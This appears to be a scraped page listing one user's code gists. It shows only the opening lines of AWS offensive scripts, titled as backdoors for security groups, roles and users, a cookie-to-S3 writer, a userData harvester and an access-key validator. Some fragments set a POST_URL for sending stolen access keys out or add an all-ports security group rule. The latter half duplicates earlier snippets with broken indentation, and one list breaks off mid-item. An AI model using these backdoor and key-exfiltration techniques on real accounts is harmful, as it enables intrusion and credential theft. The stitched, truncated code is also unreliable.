Daniel Grzelak dagrz

## github-aws-oidc-firehose.py
#!/usr/bin/env python3

import json, time, requests, re, argparse, os, boto3

def main(args):
    print("> Started...")
    if args.verbose:
        print(f"^ Args: {args}")
        s3_bucket = None
    if args.s3_bucket:

## print-aws-docs.py
#!/usr/bin/env python3

import requests, argparse
import xml.etree.ElementTree as ET

SITEMAP_URI = 'https://docs.aws.amazon.com/sitemap_index.xml'

def main():
    get_sitemap_and_parse(SITEMAP_URI)

## Write cookies to s3 bucket
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
</head>
<body>
  <script>
   $(document).ready(function(){
    $.ajax({
        type: 'PUT',
        headers: {'x-amz-acl': 'bucket-owner-full-control'},

## Retrieve all EC2 instance userData
#!/usr/bin/env python
from __future__ import print_function
import boto3
import base64

client = boto3.client(service_name='ec2', region_name='us-east-1')
for region in client.describe_regions()['Regions']:
    ec2 = boto3.resource(service_name='ec2', region_name=region['RegionName'])
    for instance in ec2.instances.all():
        response = instance.describe_attribute(Attribute='userData')

## Validate access keys
#!/usr/bin/env python
from __future__ import print_function
import boto3
from botocore.exceptions import ClientError
import json
import argparse


def main(args):
    for line in args.key_file.readlines():

## Backdoor future security groups in AWS account
#!/usr/bin/env python
from __future__ import print_function
import json
import boto3
import random

# A list of rules to add at random to security groups.
BACKDOOR_RULES = [
    { 'FromPort': 0, 'ToPort': 65535, 'CidrIp': '127.0.0.1/32', 'IpProtocol': '-1'}
]

## Backdoor future roles in AWS account
#!/usr/bin/env python
from __future__ import print_function
import json
import boto3
from botocore.exceptions import ClientError
import requests
import random

# An endpoint to send access keys to, e.g. http://requestb.in/
POST_URL = 'https://...'

## Backdoor future users in AWS account
#!/usr/bin/env python
from __future__ import print_function
import json
import boto3
from botocore.exceptions import ClientError
import requests

# An endpoint to send access keys to, e.g. http://requestb.in/
POST_URL = 'https://...'

## AWS Lambda user rabbit
#!/usr/bin/env python

from __future__ import print_function
import json
import boto3
import random
import re
import string

def lambda_handler(event, context):

## Backdoor all security groups in AWS account
#!/usr/bin/env python
from __future__ import print_function
import boto3
from botocore.exceptions import ClientError
import json
import random


# A list of rules to add at random to security groups.
BACKDOOR_RULES = [
	#!/usr/bin/env python3

	import json, time, requests, re, argparse, os, boto3

	def main(args):
	print("> Started...")
	if args.verbose:
	print(f"^ Args: {args}")
	s3_bucket = None
	if args.s3_bucket:
	#!/usr/bin/env python3

	import requests, argparse
	import xml.etree.ElementTree as ET

	SITEMAP_URI = 'https://docs.aws.amazon.com/sitemap_index.xml'

	def main():
	get_sitemap_and_parse(SITEMAP_URI)
	<html>
	<head>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
	</head>
	<body>
	<script>
	$(document).ready(function(){
	$.ajax({
	type: 'PUT',
	headers: {'x-amz-acl': 'bucket-owner-full-control'},
	#!/usr/bin/env python
	from __future__ import print_function
	import boto3
	import base64

	client = boto3.client(service_name='ec2', region_name='us-east-1')
	for region in client.describe_regions()['Regions']:
	ec2 = boto3.resource(service_name='ec2', region_name=region['RegionName'])
	for instance in ec2.instances.all():
	response = instance.describe_attribute(Attribute='userData')
	#!/usr/bin/env python
	from __future__ import print_function
	import json
	import boto3
	import random

	# A list of rules to add at random to security groups.
	BACKDOOR_RULES = [
	{ 'FromPort': 0, 'ToPort': 65535, 'CidrIp': '127.0.0.1/32', 'IpProtocol': '-1'}
	]